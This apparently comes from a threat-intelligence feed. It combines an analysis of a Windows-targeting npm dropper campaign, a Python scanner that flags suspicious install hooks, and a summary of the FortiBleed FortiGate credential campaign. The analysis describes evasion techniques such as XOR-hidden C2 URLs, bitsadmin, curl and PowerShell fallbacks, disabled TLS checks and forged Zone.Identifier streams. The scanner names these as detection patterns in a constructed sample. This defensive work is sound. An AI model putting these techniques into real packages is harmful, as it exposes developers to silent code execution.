The attacker compartmentalized the malicious operations across the packages in a way that allows each to appear harmless when analyzed individually. The exploitation begins with a preinstall hook in procwire, which executes during an npm install. This hook decodes a C2 endpoint stored as XOR-encoded byte arrays in the endpointmap package, subsequently downloading and executing a payload unnoticed. The attack specifically targets Windows systems, halting its execution on other platforms.
The malware employs multiple methods for arbitrary binary execution on Windows hosts during the npm installation process. Notably, it utilizes three distinct download techniques (Node.js HTTPS, curl.exe, bitsadmin) and three execution methods (direct spawn, cmd.exe, PowerShell). This flexibility enhances its resilience against partial system hardening measures, including Mark-of-the-Web protections designed to suppress Windows SmartScreen alerts for downloaded executables. The payloads masquerade under names associated with legitimate software updates like msedge_update and chrome_installer.
Each npm package carries a convincing description, allowing them to blend seamlessly into the npm ecosystem: procwire is described as a lifecycle and IPC library, while bytecraft is presented as a buffer transformation library. The complexity of execution is heightened by the manner in which the C2 URL is constructed, employing XOR encryption and relying on the package name as a secret key.
The dropper's construction obscures its functionality from static analysis, intentionally avoiding the use of easily detectable strings. It first attempts to retrieve the payload via an HTTP GET request while pretending to be a Microsoft delivery mechanism and disabling TLS verification to avoid detection. In the event of failure, fallback methods such as curl.exe and bitsadmin ensure that the download proceeds regardless of defenses. Furthermore, it employs a fake Zone.Identifier alternate data stream to bypass SmartScreen warnings.
The staticlayer package complements the dropper, operating as a server to serve the payloads but requiring a client that mimics the dropper's User-Agent. This self-hosting capability limits exposure while allowing for efficient distribution of the malicious payload.
In summary, this campaign demonstrates advanced evasion tactics by separating malicious functionalities into inconspicuous components. The analysis highlights the importance of monitoring installation behaviors rather than relying solely on package reputations, as these techniques effectively shield the campaign from conventional detection methods.
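
The post's closing advice is to monitor installation behaviour rather than package reputation. One static check that follows from it is to audit each installed package's lifecycle hooks (preinstall/install/postinstall) and the local script files they invoke for the indicators the report describes: a win32 platform gate, child_process use, bitsadmin/curl.exe/PowerShell/cmd.exe strings, disabled TLS verification, long numeric byte arrays that hide an encoded C2 URL, and Zone.Identifier handling. This is an added example, not the report's or any package's own code; the package names, manifests and the script fragment are constructed placeholders, and in practice `files` would be read from node_modules/<package>.

```python
import json
import re

# npm lifecycle hooks that execute code during "npm install".
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Static indicators drawn from the behaviours described in the report above.
INDICATORS = {
    "platform_gate": re.compile(r"process\.platform\s*[!=]==?\s*['\"]win32['\"]"),
    "child_process": re.compile(r"child_process|\b(?:spawn|exec|execSync|spawnSync)\s*\("),
    "lolbin_download": re.compile(r"\b(?:bitsadmin|curl\.exe)\b", re.I),
    "shell_exec": re.compile(r"\b(?:powershell|cmd\.exe)\b", re.I),
    "tls_disabled": re.compile(r"rejectUnauthorized\s*:\s*false|NODE_TLS_REJECT_UNAUTHORIZED"),
    "encoded_byte_array": re.compile(r"\[(?:\s*\d{1,3}\s*,){7,}\s*\d{1,3}\s*\]"),
    "motw_tamper": re.compile(r"Zone\.Identifier"),
}


def audit_package(package_json, files):
    """Audit one package. `package_json` is the manifest text; `files` maps the package's
    relative file paths to their contents (constructed here; read from node_modules in use)."""
    manifest = json.loads(package_json)
    scripts = manifest.get("scripts") or {}
    hooks = {h: scripts[h] for h in LIFECYCLE_HOOKS if h in scripts}
    found = set()
    for cmd in hooks.values():
        texts = [cmd]
        # Follow local script files the hook invokes, e.g. "node setup.js" or "node ./lib/post.cjs".
        for ref in re.findall(r"[\w./-]+\.(?:js|cjs|mjs)\b", cmd):
            ref = ref[2:] if ref.startswith("./") else ref
            if ref in files:
                texts.append(files[ref])
        for text in texts:
            found.update(name for name, pat in INDICATORS.items() if pat.search(text))
    return {"name": manifest.get("name"), "hooks": hooks, "indicators": sorted(found)}


def verdict(report):
    """block: install hook plus two or more indicators; review: any install hook; ok: neither."""
    if report["hooks"] and len(report["indicators"]) >= 2:
        return "block"
    return "review" if report["hooks"] else "ok"


# Constructed samples; placeholder names, not the packages named in the report.
MALICIOUS_MANIFEST = json.dumps({
    "name": "example-ipc-lib", "version": "0.0.1",
    "description": "Lifecycle and IPC helpers",
    "scripts": {"preinstall": "node setup.js"},
})
MALICIOUS_FILES = {"setup.js": """
// constructed fragment carrying the report's indicators; not a working dropper
if (process.platform !== 'win32') process.exit(0);
const { spawn } = require('child_process');
const enc = [104, 116, 116, 112, 115, 58, 47, 47];   // XOR-encoded bytes decoded at runtime
const opts = { rejectUnauthorized: false };          // TLS verification disabled
// fallback downloads via bitsadmin /transfer or curl.exe, then a forged Zone.Identifier stream
"""}
BENIGN_MANIFEST = json.dumps({          # native addon: has an install hook but no indicators
    "name": "example-native-addon", "version": "2.0.0",
    "scripts": {"install": "node-gyp rebuild"},
})
CLEAN_MANIFEST = json.dumps({           # no lifecycle hooks at all
    "name": "example-pure-js", "version": "1.0.0",
    "scripts": {"test": "node test.js"},
})

if __name__ == "__main__":
    for manifest, files in ((MALICIOUS_MANIFEST, MALICIOUS_FILES), (BENIGN_MANIFEST, {}), (CLEAN_MANIFEST, {})):
        report = audit_package(manifest, files)
        print(f"{report['name']:22} {verdict(report):7} hooks={list(report['hooks'])} {report['indicators']}")
```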

#tireport #ExtractedDiagrams
The key diagram for the report (ML Classifier):
schema: 1, table: 1, windows: 1, code: 5, chart: 3, chats: 1, dump: 1

#threatreport #MediumCompleteness
Inside the FortiBleed Open Directory: A Technical Analysis of What the Attacker Left Behind | 19-06-2026
Source: cloudsek.com/blog/inside-th…
Key details below ↓
🧑💻Actors/Campaigns:
Fortibleed
💀Threats:
Impacket_tool, Password_spray_technique, Credential_harvesting_technique,
🎯Victims: Telecommunications, Internet service providers, Organisations running exposed fortios management interfaces
🏭Industry: Telco
🌐Geo: Mexico, Taiwan, India, Turkey, Asia, Colombia, United states
🤖LLM extracted TTPs:
T1040, T1078, T1087.002, T1110, T1110.002, T1110.003, T1110.004, T1133, T1135, T1552, ...
🧨IOCs:
- File: 11
- IP: 9
💽Software: Telegram, Active Directory
🔢Algorithms: sha256, pbkdf2
#threatreport:
FortiBleed is an extensive credential-compromise campaign actively targeting Fortinet FortiGate firewalls and SSL VPN gateways on the internet. It is characterized not as a software vulnerability or a zero-day exploit but as the result of a database compiled by a threat actor through credential reuse, brute force attacks, and offline hash cracking against exposed devices.
The evidence left by attackers includes various scripts and tools categorized into distinct operational layers. Layer 1 consists of credential data gathered from device configuration exports via exposed management interfaces, containing legacy salted-SHA256 and newer PBKDF2 format hashes that identify firewall administrators. However, attribution based on FortiGuard license registration emails is problematic, as many high-profile credentials link to contractors or subsidiaries rather than the corporations themselves. Layer 2 involves advanced credential capture techniques like Kerberos pre-authentication data acquired through network sniffing after network pivoting, which reveals internal Active Directory domain names from the victim's infrastructure.
The operational toolkit indicates the campaign's capability to extend beyond the firewall itself, utilizing tools such as ad_enum.py for enumerating Active Directory over LDAP and conducting password spraying against internal domain controllers with scripts like spray_admin.sh. The reported cracking power was linked to a modest configuration of rented GPU instances rather than a dedicated cluster, revealing a potential underestimation of the campaign’s resources.
The dataset, termed targets_300M_plus.txt, ranks SSH and VPN endpoints by revenue, confirming that the attackers had usable access rather than merely cracked password lists. While the attackers’ origins remain difficult to pin down, some linguistic clues in their tooling hint at Russian influence, though numerous named passwords suggest connections to Persian regions as well.
Regarding the extent of the compromise, India has the highest number of affected devices, followed by the United States and Taiwan. Despite the reported presence of approximately 21,000 compromised domains, most belong to internal network names that are not externally traceable, thus over-reporting the actual compromised organizations. The mix of public and non-routable domain entries suggests a wide-reaching campaign that indiscriminately scanned for exposed Fortinet products without specific targeting.
Given the operation's sophistication, organizations with exposed FortiOS management interfaces are advised to treat their credentials as compromised. Recommended mitigation strategies include removing public exposure of the management interfaces, rotating administrator and VPN credentials, enforcing multi-factor authentication, and ensuring that devices are updated to the latest FortiOS, thereby securing the integrity of access control systems. Additionally, organizations should audit for backdoor accounts and unusual login patterns, replacing devices when signs of compromise are evident.
